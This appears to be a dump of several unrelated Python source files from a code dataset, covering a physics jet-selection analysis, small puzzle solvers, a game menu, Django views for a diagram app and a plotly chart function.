fatjet_idx_H = 0
valid_Higgs = False
if self.isZtoMM:
fatjet_maxpt = 0.
for i,fatjet_tlv in enumerate(fatjet_tlv_list):
if fatjet_tlv.DeltaR(mu1_tlv)>0.8 and fatjet_tlv.DeltaR(mu2_tlv)>0.8 and fatjet_tlv.Pt()>fatjet_maxpt:
fatjet_maxpt=fatjet_tlv.Pt()
fatjet_idx_H = i
valid_Higgs = True
if not valid_Higgs:
return False
elif self.isZtoEE:
fatjet_maxpt = 0.
for i,fatjet_tlv in enumerate(fatjet_tlv_list):
if fatjet_tlv.DeltaR(el1_tlv)>0.8 and fatjet_tlv.DeltaR(el2_tlv)>0.8 and fatjet_tlv.Pt()>fatjet_maxpt:
fatjet_maxpt=fatjet_tlv.Pt()
fatjet_idx_H = i
valid_Higgs = True
if not valid_Higgs:
return False
elif self.isZtoNN:
fatjet_maxpt = 0.
for i,fatjet_tlv in enumerate(fatjet_tlv_list):
if fatjet_tlv.Pt()>fatjet_maxpt:
fatjet_maxpt=fatjet_tlv.Pt()
fatjet_idx_H = i
############ AK4 Jet ###########
for ijet in range(event.nJet):
jet_pt = event.Jet_pt[ijet]
jet_eta = event.Jet_eta[ijet]
jet_phi = event.Jet_phi[ijet]
jet_mass = event.Jet_mass[ijet]
jet_tlv = ROOT.TLorentzVector()
jet_tlv.SetPtEtaPhiM(jet_pt,jet_eta,jet_phi,jet_mass)
self.HT += jet_pt
if jet_eta > -2.5 and jet_eta < -1.479 and jet_phi > -1.55 and jet_phi < -0.9:
if self.HT_HEM15_16 == -1.:
self.HT_HEM15_16 = 0.
self.HT_HEM15_16 += jet_pt
if jet_pt > ak4_pt_cut and abs(jet_eta) < ak4_eta_cut:
cleanJet = True
for loose_electrons_tlv in loose_electrons_tlv_list:
if loose_electrons_tlv.DeltaR(jet_tlv) < 0.4:
cleanJet = False
for loose_muons_tlv in loose_muons_tlv_list:
if loose_muons_tlv.DeltaR(jet_tlv) < 0.4:
cleanJet = False
if cleanJet and getJetID(self.year,event,ijet):
if len(fatjet_tlv_list) > 0 and fatjet_tlv_list[fatjet_idx_H].DeltaR(jet_tlv) > 1.2:
jet_tlv_list.append(jet_tlv)
idx_jet.append(ijet)
############ AK4 Jet check for VBF ###########
if self.isZtoMM:
lep1_tlv = mu1_tlv
lep2_tlv = mu2_tlv
if self.isZtoEE:
lep1_tlv = el1_tlv
lep2_tlv = el2_tlv
for ijet in range(event.nJet):
jet_pt = event.Jet_pt[ijet]
jet_eta = event.Jet_eta[ijet]
jet_phi = event.Jet_phi[ijet]
jet_mass = event.Jet_mass[ijet]
jet_tlv = ROOT.TLorentzVector()
jet_tlv.SetPtEtaPhiM(jet_pt,jet_eta,jet_phi,jet_mass)
if abs(jet_eta) < 5.0:
if len(fatjet_tlv_list) > 0:
if fatjet_tlv_list[fatjet_idx_H].DeltaR(jet_tlv) > 1.2:
if getJetID(self.year,event,ijet) and event.Jet_puId[ijet]==7:
if self.isZtoMM or self.isZtoEE:
if jet_tlv.DeltaR(lep1_tlv)>0.4 and jet_tlv.DeltaR(lep2_tlv)>0.4:
jet_tlv_list_vbf.append(jet_tlv)
idx_jet_vbf.append(ijet)
elif self.isZtoNN:
jet_tlv_list_vbf.append(jet_tlv)
idx_jet_vbf.append(ijet)
idx1_vbf = -1
idx2_vbf = -1
maxVBFmass = -1.
for ijet1, jet1_tlv in enumerate(jet_tlv_list_vbf):
for ijet2, jet2_tlv in enumerate(jet_tlv_list_vbf):
if ijet1 == ijet2: continue
eta1 = jet_tlv_list_vbf[ijet1].Eta()
eta2 = jet_tlv_list_vbf[ijet2].Eta()
V_VBF = jet_tlv_list_vbf[ijet1]+jet_tlv_list_vbf[ijet2]
VBFmass = V_VBF.M()
if abs(eta1-eta2)>4.0 and eta1*eta2<0. and VBFmass>maxVBFmass:
idx1_vbf = ijet1
idx2_vbf = ijet2
maxVBFmass = VBFmass
self.dijet_VBF_mass = maxVBFmass
if maxVBFmass > 500.:
self.isVBF = True
self.Jet1_VBF_pt = jet_tlv_list_vbf[idx1_vbf].Pt()
self.Jet1_VBF_eta = jet_tlv_list_vbf[idx1_vbf].Eta()
self.Jet1_VBF_phi = jet_tlv_list_vbf[idx1_vbf].Phi()
self.Jet1_VBF_mass = jet_tlv_list_vbf[idx1_vbf].M()
self.Jet2_VBF_pt = jet_tlv_list_vbf[idx2_vbf].Pt()
self.Jet2_VBF_eta = jet_tlv_list_vbf[idx2_vbf].Eta()
self.Jet2_VBF_phi = jet_tlv_list_vbf[idx2_vbf].Phi()
self.Jet2_VBF_mass = jet_tlv_list_vbf[idx2_vbf].M()
self.deltaR_VBF = jet_tlv_list_vbf[idx1_vbf].DeltaR(jet_tlv_list_vbf[idx2_vbf])
self.deltaR_HVBFjet1 = (fatjet_tlv_list[fatjet_idx_H].DeltaR(jet_tlv_list_vbf[idx1_vbf]))
self.deltaR_HVBFjet2 = (fatjet_tlv_list[fatjet_idx_H].DeltaR(jet_tlv_list_vbf[idx2_vbf]))
########## Higgs ########
H = fatjet_tlv_list[fatjet_idx_H]
if self.runJEC:
self.H_mass_nom = event.FatJet_msoftdrop_nom[fatjet_idx_H]
self.H_mass_jmsUp = event.FatJet_msoftdrop_jmsUp[fatjet_idx_H]
self.H_mass_jmsDown = event.FatJet_msoftdrop_jmsDown[fatjet_idx_H]
self.H_mass_jmrUp = event.FatJet_msoftdrop_jmrUp[fatjet_idx_H]
self.H_mass_jmrDown = event.FatJet_msoftdrop_jmrDown[fatjet_idx_H]
self.H_pt_nom = event.FatJet_pt_nom[fatjet_idx_H]
self.H_pt_jesUp = event.FatJet_pt_jesTotalUp[fatjet_idx_H]
self.H_pt_jesDown = event.FatJet_pt_jesTotalDown[fatjet_idx_H]
self.H_pt_jerUp = event.FatJet_pt_jerUp[fatjet_idx_H]
self.H_pt_jerDown = event.FatJet_pt_jerDown[fatjet_idx_H]
self.PuppiMET_pt_nom = event.PuppiMET_pt_nom
self.PuppiMET_pt_jesUp = event.PuppiMET_pt_jesTotalUp
self.PuppiMET_pt_jesDown = event.PuppiMET_pt_jesTotalDown
self.PuppiMET_pt_jerUp = event.PuppiMET_pt_jerUp
self.PuppiMET_pt_jerDown = event.PuppiMET_pt_jerDown
H_Eta = H.Eta()
H_Phi = H.Phi()
H_M = H.M()
H_nom = ROOT.TLorentzVector()
H_jesUp = ROOT.TLorentzVector()
H_jesDown = ROOT.TLorentzVector()
H_jerUp = ROOT.TLorentzVector()
H_jerDown = ROOT.TLorentzVector()
H_nom.SetPtEtaPhiM(self.H_pt_nom,H_Eta,H_Phi,H_M)
H_jesUp.SetPtEtaPhiM(self.H_pt_jesUp,H_Eta,H_Phi,H_M)
H_jesDown.SetPtEtaPhiM(self.H_pt_jesDown,H_Eta,H_Phi,H_M)
H_jerUp.SetPtEtaPhiM(self.H_pt_jerUp,H_Eta,H_Phi,H_M)
H_jerDown.SetPtEtaPhiM(self.H_pt_jerDown,H_Eta,H_Phi,H_M)
MET_nom = ROOT.TLorentzVector()
MET_jesUp = ROOT.TLorentzVector()
MET_jesDown = ROOT.TLorentzVector()
MET_jerUp = ROOT.TLorentzVector()
MET_jerDown = ROOT.TLorentzVector()
MET_nom.SetPtEtaPhiM(self.PuppiMET_pt_nom,0.,event.PuppiMET_phi,self.PuppiMET_pt_nom)
MET_jesUp.SetPtEtaPhiM(self.PuppiMET_pt_jesUp,0.,event.PuppiMET_phi,self.PuppiMET_pt_jesUp)
MET_jesDown.SetPtEtaPhiM(self.PuppiMET_pt_jesDown,0.,event.PuppiMET_phi,self.PuppiMET_pt_jesDown)
MET_jerUp.SetPtEtaPhiM(self.PuppiMET_pt_jerUp,0.,event.PuppiMET_phi,self.PuppiMET_pt_jerUp)
MET_jerDown.SetPtEtaPhiM(self.PuppiMET_pt_jerDown,0.,event.PuppiMET_phi,self.PuppiMET_pt_jerDown)
for ifatjet in idx_fatjet:
if event.FatJet_btagHbb[ifatjet] > 0.3:
self.isBoosted4B = True
self.nJetsNoFatJet = len(jet_tlv_list)
if self.isZtoNN:
self.DPhi = abs(MET_tlv.DeltaPhi(H))
else:
self.DPhi = abs(V.DeltaPhi(H))
self.VH_deltaR = H.DeltaR(V)
jet_list_temp = []
for ijet in range(event.nJet):
jet_pt = event.Jet_pt[ijet]
jet_eta = event.Jet_eta[ijet]
jet_phi = event.Jet_phi[ijet]
jet_mass = event.Jet_mass[ijet]
jet_tlv = ROOT.TLorentzVector()
jet_tlv.SetPtEtaPhiM(jet_pt,jet_eta,jet_phi,jet_mass)
if jet_tlv.DeltaR(H) < 0.8:
jet_list_temp.append(ijet)
if len(jet_list_temp) == 1:
idx = jet_list_temp[0]
self.H_chf = event.Jet_chHEF[idx]
self.H_nhf = event.Jet_neHEF[idx]
elif len(jet_list_temp) == 2:
idx1 = jet_list_temp[0]
idx2 = jet_list_temp[1]
pt1 = event.Jet_pt[idx1]
pt2 = event.Jet_pt[idx2]
chf1 = event.Jet_chHEF[idx1]
chf2 = event.Jet_chHEF[idx2]
nhf1 = event.Jet_neHEF[idx1]
nhf2 = event.Jet_neHEF[idx2]
self.H_chf = (chf1*pt1+chf2*pt2)/(pt1+pt2)
self.H_nhf = (nhf1*pt1+nhf2*pt2)/(pt1+pt2)
elif len(jet_list_temp) == 3:
idx1 = jet_list_temp[0]
idx2 = jet_list_temp[1]
idx3 = jet_list_temp[2]
pt1 = event.Jet_pt[idx1]
pt2 = event.Jet_pt[idx2]
pt3 = event.Jet_pt[idx3]
chf1 = event.Jet_chHEF[idx1]
chf2 = event.Jet_chHEF[idx2]
chf3 = event.Jet_chHEF[idx3]
nhf1 = event.Jet_neHEF[idx1]
nhf2 = event.Jet_neHEF[idx2]
nhf3 = event.Jet_neHEF[idx3]
self.H_chf = (chf1*pt1+chf2*pt2+chf3*pt3)/(pt1+pt2+pt3)
self.H_nhf = (nhf1*pt1+nhf2*pt2+nhf3*pt3)/(pt1+pt2+pt3)
for jet_tlv in jet_tlv_list:
if abs(MET_tlv.DeltaPhi(jet_tlv)) < self.MinJetMetDPhi:
self.MinJetMetDPhi = abs(MET_tlv.DeltaPhi(jet_tlv))
for ijet in idx_jet:
if event.Jet_btagDeepB[ijet] > self.MaxJetNoFatJetBTag:
self.MaxJetNoFatJetBTag = event.Jet_btagDeepB[ijet]
if not self.isData:
for igenjet in range(event.nGenJetAK8):
genjetAK8_tlv = ROOT.TLorentzVector()
genjetAK8_tlv.SetPtEtaPhiM(event.GenJetAK8_pt[igenjet], event.GenJetAK8_eta[igenjet], event.GenJetAK8_phi[igenjet], event.GenJetAK8_mass[igenjet])
if H.DeltaR(genjetAK8_tlv) < 0.8:
self.H_hadronflavour = struct.unpack('B',event.GenJetAK8_hadronFlavour[igenjet])[0]
self.H_partonflavour = event.GenJetAK8_partonFlavour[igenjet]
self.btagToolAK4_deep.fillEfficiencies(event,idx_jet,fatjet_idx_H)
self.BTagAK4Weight_deep = self.btagToolAK4_deep.getWeight(event,idx_jet,fatjet_idx_H)
self.BTagAK4Weight_deep_up = self.btagToolAK4_deep_up.getWeight(event,idx_jet,fatjet_idx_H)
self.BTagAK4Weight_deep_down = self.btagToolAK4_deep_down.getWeight(event,idx_jet,fatjet_idx_H)
#search for AK4 jets which match with the subjets from the H
ak4_subjets = []
subjet1 = TLorentzVector()
subjet2 = TLorentzVector()
subjet1_idx = event.FatJet_subJetIdx1[fatjet_idx_H]
subjet2_idx = event.FatJet_subJetIdx2[fatjet_idx_H]
if subjet1_idx>=0. and subjet2_idx>=0.:
subjet1.SetPtEtaPhiM(event.SubJet_pt[subjet1_idx],event.SubJet_eta[subjet1_idx],event.SubJet_phi[subjet1_idx],event.SubJet_mass[subjet1_idx])
subjet2.SetPtEtaPhiM(event.SubJet_pt[subjet2_idx],event.SubJet_eta[subjet2_idx],event.SubJet_phi[subjet2_idx],event.SubJet_mass[subjet2_idx])
for jetid in range(event.nJet):
ak4jet = TLorentzVector()
ak4jet.SetPtEtaPhiM(event.Jet_pt[jetid],event.Jet_eta[jetid],event.Jet_phi[jetid],event.Jet_mass[jetid])
if ak4jet.DeltaR(subjet1)<0.4:
ak4_subjets.append(jetid)
if ak4jet.DeltaR(subjet2)<0.4:
ak4_subjets.append(jetid)
self.btagToolAK8_deep.fillEfficiencies(event,ak4_subjets,fatjet_idx_H)
self.BTagAK8Weight_deep = self.btagToolAK8_deep.getWeight(event,ak4_subjets,fatjet_idx_H)
self.BTagAK8Weight_deep_up = self.btagToolAK8_deep_up.getWeight(event,ak4_subjets,fatjet_idx_H)
self.BTagAK8Weight_deep_down = self.btagToolAK8_deep_down.getWeight(event,ak4_subjets,fatjet_idx_H)
########### X and variables ############
X = V + H
if self.isZtoNN:
X_chs = V_chs + H
self.X_mass_chs = X_chs.M()
if self.runJEC:
X_nom = V + H_nom
X_jesUp = V + H_jesUp
X_jesDown = V + H_jesDown
X_jerUp = V + H_jerUp
X_jerDown = V + H_jerDown
X_MET_nom = MET_nom + H_nom
X_MET_jesUp = MET_jesUp + H_jesUp
X_MET_jesDown = MET_jesDown + H_jesDown
X_MET_jerUp = MET_jerUp + H_jerUp
X_MET_jerDown = MET_jerDown + H_jerDown
self.X_mass_nom = X_nom.M()
self.X_mass_jesUp = X_jesUp.M()
self.X_mass_jesDown = X_jesDown.M()
self.X_mass_jerUp = X_jerUp.M()
self.X_mass_jerDown = X_jerDown.M()
self.X_mass_MET_nom = X_MET_nom.M()
self.X_mass_MET_jesUp = X_MET_jesUp.M()
self.X_mass_MET_jesDown = X_MET_jesDown.M()
self.X_mass_MET_jerUp = X_MET_jerUp.M()
self.X_mass_MET_jerDown = X_MET_jerDown.M()
self.V_pt = V.Pt()
self.V_eta = V.Eta()
self.V_phi = V.Phi()
self.V_mass = V.M()
if self.isZtoNN:
self.V_mass = 0.
self.H_pt = H.Pt()
self.H_eta = H.Eta()
self.H_phi = H.Phi()
self.H_M = H.M()
self.H_mass = event.FatJet_msoftdrop[fatjet_idx_H]
self.X_pt = X.Pt()
self.X_eta = X.Eta()
self.X_phi = X.Phi()
self.X_mass = X.M()
self.H_dbt = event.FatJet_btagHbb[fatjet_idx_H]
self.BtagDeepB = event.FatJet_btagDeepB[fatjet_idx_H]
self.DeepTagMD_H4qvsQCD = event.FatJet_deepTagMD_H4qvsQCD[fatjet_idx_H]
self.DeepTagMD_HbbvsQCD = event.FatJet_deepTagMD_HbbvsQCD[fatjet_idx_H]
self.DeepTagMD_ZHbbvsQCD = event.FatJet_deepTagMD_ZHbbvsQCD[fatjet_idx_H]
self.DeepTagMD_ZbbvsQCD = event.FatJet_deepTagMD_ZbbvsQCD[fatjet_idx_H]
self.DeepTagMD_bbvsLight = event.FatJet_deepTagMD_bbvsLight[fatjet_idx_H]
self.DeepTagMD_WvsQCD = event.FatJet_deepTagMD_WvsQCD[fatjet_idx_H]
self.DeepTagMD_ZvsQCD = event.FatJet_deepTagMD_ZvsQCD[fatjet_idx_H]
self.H_tau21 = fatjet_tau21_list[fatjet_idx_H]
self.H_tau41 = fatjet_tau41_list[fatjet_idx_H]
self.H_tau42 = fatjet_tau42_list[fatjet_idx_H]
self.H_tau31 = fatjet_tau31_list[fatjet_idx_H]
self.H_tau32 = fatjet_tau32_list[fatjet_idx_H]
self.VHDEta = abs(V.Eta() - H.Eta())
if event.FatJet_subJetIdx1[fatjet_idx_H] >= 0:
Hcsv1 = event.SubJet_btagCSVV2[event.FatJet_subJetIdx1[fatjet_idx_H]]
Hdeepcsv1 = event.SubJet_btagDeepB[event.FatJet_subJetIdx1[fatjet_idx_H]]
else:
Hcsv1 = -1.
Hdeepcsv1 = -1.
if event.FatJet_subJetIdx2[fatjet_idx_H] >= 0:
Hcsv2 = event.SubJet_btagCSVV2[event.FatJet_subJetIdx2[fatjet_idx_H]]
Hdeepcsv2 = event.SubJet_btagDeepB[event.FatJet_subJetIdx2[fatjet_idx_H]]
else:
Hcsv2 = -1.
Hdeepcsv2 = -1.
self.H_csv1 = max(Hcsv1,Hcsv2)
self.H_csv2 = min(Hcsv1,Hcsv2)
self.H_deepcsv1 = max(Hdeepcsv1,Hdeepcsv2)
self.H_deepcsv2 = min(Hdeepcsv1,Hdeepcsv2)
if self.year == 2016:
wp_loose = 0.2217
wp_medium = 0.6321
wp_tight = 0.8953
elif self.year == 2017:
wp_loose = 0.1522
wp_medium = 0.4941
wp_tight = 0.8001
elif self.year == 2018:
wp_loose = 0.1241
wp_medium = 0.4184
wp_tight = 0.7527
if self.H_deepcsv2 > wp_loose:
self.isHtobb = True
if self.H_deepcsv1 > wp_medium and self.H_deepcsv2 > wp_loose:
self.isHtobb_ml = True
if self.MaxJetNoFatJetBTag > wp_loose:
self.isMaxBTag_loose = True
if self.MaxJetNoFatJetBTag > wp_medium:
self.isMaxBTag_medium = True
if self.MaxJetNoFatJetBTag > wp_tight:
self.isMaxBTag_tight = True
if self.H_mass != 0.:
self.H_ddt = self.H_tau21 + 0.082 *np.log(self.H_mass*self.H_mass/self.H_pt)
else:
self.H_ddt = -1.
self.X_tmass = np.sqrt(2.*V.Pt()*fatjet_tlv_list[fatjet_idx_H].Pt()*(1.-np.cos(fatjet_tlv_list[fatjet_idx_H].DeltaPhi(V))))
if self.isZtoNN:
self.X_mass = self.X_tmass
else:
self.X_mass = X.M()
if self.X_mass > 750 and self.VH_deltaR > 2:
if self.MinJetMetDPhi>0.5 and self.DPhi>2:
for i,weight in enumerate(nncutflow_list):
self.out.nncutflow_inc.Fill(i,weight)
if self.VHDEta<1.3:
for i,weight in enumerate(eecutflow_list):
self.out.eecutflow_inc.Fill(i,weight)
for i,weight in enumerate(mmcutflow_list):
self.out.mmcutflow_inc.Fill(i,weight)
if self.isZtoEE or self.isZtoMM or self.isZtoNN or self.isTtoEM:
self.fillBranches(event)
return True
|
4,395 | 7e83d11bb43229eaa199514b4be6a0acf3ab36ce | def lengthOfLongestSubstring(s):
max_len = 0
for i in range(len(s)):
storage = set()
count = 0
for j in range(i, len(s)):
if not s[j] in storage:
storage.append(s[j])
count += 1
else:
break
max_len = max(max_len, count)
return max_len
print(lengthOfLongestSubstring('abcabcbb')) |
4,396 | 870d260b58c10e0379d66c3b44bc45594ff7d666 |
def solve():
valid_passes = 0
with open('.\day4.txt') as fp:
for line in fp.read().strip().splitlines():
list_of_words = set()
add = 1
for word in line.split():
modified_word = ''.join(sorted(word))
if modified_word in list_of_words:
add = 0
break
else:
list_of_words.add(modified_word)
valid_passes += add
return valid_passes
print(solve())
|
4,397 | f1547e0893ce9c4661b546e49f3fc998745390d9 |
from collections import OrderedDict
import tcod.event
from components import Entity, PaperDoll, Brain
from components.enums import Intention
from engine import GameScene
from scenes.list_menu_scene import MenuAction, ListMenuScene
from systems.utilities import set_intention, retract_intention
def run(scene: GameScene):
handle_show_equip_screen(scene)
def handle_show_equip_screen(scene: GameScene):
brains = [b for b in scene.cm.get(Brain) if b.intention is Intention.SHOW_EQUIP_SCREEN]
for brain in brains:
entity = brain.entity
menu_actions = OrderedDict()
equip_action = MenuAction('e', 'equip', lambda slot: set_intention(scene, entity, slot, Intention.EQUIP_SLOT))
menu_actions[tcod.event.K_e] = equip_action
equipment_scene = ListMenuScene(
"Equipment",
get_slots_query(scene, entity),
row_builder=row_builder,
default_action=equip_action,
menu_actions=menu_actions,
id_extractor=lambda e: e[1],
parent_scene=scene
)
scene.controller.push_scene(equipment_scene)
retract_intention(scene, entity)
def get_slots_query(scene: GameScene, entity: int):
"""Return a query that resolves to entity's equipment slots and their equipped items."""
def query():
paper_doll: PaperDoll = scene.cm.get_one(PaperDoll, entity)
equipment = paper_doll.get_equipment()
return [
(k, scene.cm.get_one(Entity, v))
for k, v in equipment.items()
]
return query
def row_builder(entity):
part_name = entity[0]
equipped = entity[1].name if entity[1] else ''
return [part_name, equipped]
|
4,398 | fbbf27f063f6d866e5d0b1210ea9acaebb3bdfb4 | from django.shortcuts import render, get_object_or_404
from django.template.loader import render_to_string
from django.http import JsonResponse
from django.contrib.auth.models import User
from diagen.utils.DiagramCreator import build_diagram_from_code
from diagen.utils.TextConverter import convert_text_to_code
from diagen.utils.extraction.ComponentsExtractor import DEFAULT_COMPONENTS
from django.contrib.auth import authenticate, login, logout
from .models import *
import time
import re
def _build_default_components_text():
text = ''
for c in DEFAULT_COMPONENTS:
text += c + '\n'
return text
DEFAULT_COMPONENTS_TEXT = _build_default_components_text()
SERV_FULL_ADDRESS = 'http://127.0.0.1:8000/'
def autentificate_user(request):
username = request.POST['username']
password = request.POST['password']
user = authenticate(username=username, password=password)
data = {'error': False}
if user is not None:
if user.is_active:
login(request, user)
else:
data['error'] = True
data['error_message'] = 'Этот аккаутн заблокирован.'
else:
data['error'] = True
data['error_message'] = 'Неправильный логин или пароль.'
return JsonResponse(data)
def logout_user(request):
logout(request)
return render(request, 'index.html', {'components': DEFAULT_COMPONENTS_TEXT})
def registrate_user(request):
username = request.POST['username']
password = request.POST['password']
try:
new_user = User.objects.create_user(username, password=password)
except Exception:
return JsonResponse({'error': True, 'error_message': "Пользователь с таким именем уже существует."})
else:
return JsonResponse({'error': False})
def load_user_data(request):
user = request.user
data = {'error': False, 'is_autentificated': False}
if user.is_authenticated():
diagrams = Diagram.objects.filter(author=user)
data['html_text'] = render_to_string('account_data.html', {
"diagrams": diagrams, 'username': user.username
})
data['is_autentificated'] = True
else:
data['error'] = True
data['error_message'] = 'Пользователь не выполнил вход в аккаунт.'
return JsonResponse(data)
def load_user_diagram(request):
user = request.user
pk = request.POST['pk']
data = {'error': False}
if user.is_authenticated():
diagram = get_object_or_404(Diagram, id=pk)
if diagram.author.id == user.id:
data['code'] = diagram.text
data['url'] = diagram.image_url
data['title'] = diagram.title
else:
data['error'] = True
data['error_message'] = 'Недостаточно прав для данного действия.'
else:
data['error'] = True
data['error_message'] = 'Пользователь не вошел в систему.'
return JsonResponse(data)
def diagen_main(request):
return render(request, 'index.html', {'components': DEFAULT_COMPONENTS_TEXT})
def save_diagram_for_user(request):
data = {'error': False}
if request.user.is_authenticated():
code = request.POST['code']
file_name = build_diagram_from_code(code)
url = SERV_FULL_ADDRESS + 'static/diagrams/' + file_name
title = request.POST['title']
diagram = Diagram.objects.filter(author=request.user, title=title)
if diagram.count() == 1:
diagram = diagram[0]
diagram.image_url = url
diagram.text = code
diagram.save()
data['message'] = 'Диаграмма успешно обновлена.'
else:
new_diagram = Diagram.objects.create(title=title, author=request.user, text=code, image_url=url)
if new_diagram != None:
data['message'] = 'Диаграмма успешно сохранена.'
else:
data['error'] = True
data['error_message'] = 'Не получилось сохранить диаграмму.'
else:
data['error'] = True
data['error_message'] = 'Пользователь не вошел в систему.'
return JsonResponse(data)
def delete_user_diagram(request):
user = request.user
pk = request.POST['pk']
data = {'error': False}
if user.is_authenticated():
diagram = get_object_or_404(Diagram, id=pk)
if diagram.author.id == user.id:
diagram.delete()
else:
data['error'] = True
data['error_message'] = 'Недостаточно прав для данного действия.'
else:
data['error'] = True
data['error_message'] = 'Пользователь не вошел в систему.'
return JsonResponse(data)
def get_diagram(request):
responce = {}
try:
file_name = build_diagram_from_code(request.POST['code'])
url = SERV_FULL_ADDRESS + 'static/diagrams/' + file_name
responce = {'image_url': url}
except Exception as e:
responce = {'error': 'true', 'message': str(e)}
return JsonResponse(responce)
def generate_diagram(request):
responce = {}
text = request.POST['text']
component_types = _parse_text_to_lines(request.POST['component_types'])
component_names = _parse_text_to_lines(request.POST['component_names'])
try:
code = convert_text_to_code(text, component_types, component_names)
file_name = build_diagram_from_code(code)
url = SERV_FULL_ADDRESS + 'static/diagrams/' + file_name
responce = {'code': code, 'image_url': url}
except Exception as e:
responce = {'error': 'true', 'message': str(e)}
return JsonResponse(responce)
def _parse_text_to_lines(text):
lines = []
for line in text.split('\n'):
if _words_number(line) == 1:
lines.append(line)
return lines
def _words_number(line):
words = re.findall(r"[\w]+", line)
return len(words)
|
4,399 | 8348d353e6fdea77c9c994d541db1420ef57a797 | import numpy as np
import pandas as pd
import plotly.graph_objects as go
from matplotlib import pyplot as plt
def plot_feature_VS_Observed(feature, df, linecolor):
"""
This function plots the 1880-2004 time series plots for the selected feature and observed earth
:param
Input: df -- > The dataframe of each of the features,processed before
feature --> The feature to compare with observed earth temperature
linecolor --> The line color for this feature
Output : the plot of feaure compared with observed earth temperature
"""
assert isinstance(df,pd.DataFrame)
assert isinstance(feature,str)
assert isinstance(linecolor,str)
fig = go.Figure()
fig.add_trace(go.Scatter(
x=df['Year'],
y=df[feature],
name=feature,
line_color=linecolor,
opacity=1))
fig.add_trace(go.Scatter(
x=df['Year'],
y=df['Observed'],
name="Observed",
line_color='dimgray',
opacity=0.5) )
# Use date string to set xaxis range
fig.update_layout(plot_bgcolor='rgba(0, 0, 0,0)',
xaxis_title="1880- 2005",
yaxis_title="Average Temp (K)",
title_text= feature + " vs Observed",
showlegend=True)
fig.show()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.